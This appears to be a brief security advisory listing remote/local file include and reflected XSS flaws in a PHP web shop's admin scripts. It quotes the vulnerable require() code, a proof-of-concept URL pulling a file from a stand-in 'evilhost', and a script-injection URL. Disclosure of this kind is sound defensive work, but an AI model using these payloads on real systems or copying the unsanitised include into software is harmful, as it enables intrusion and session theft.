1. Multiple Remote/Local File Include Example: ... $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:''; ... if($command!="") { switch($command){ ... case 'include_page': require($HTTP_GET_VARS['include_page']); break; ... http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php Local File Include vulnerability found in script includes/events_application_top.php 2. Linked XSS vulnerability Example http://www.example.com/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>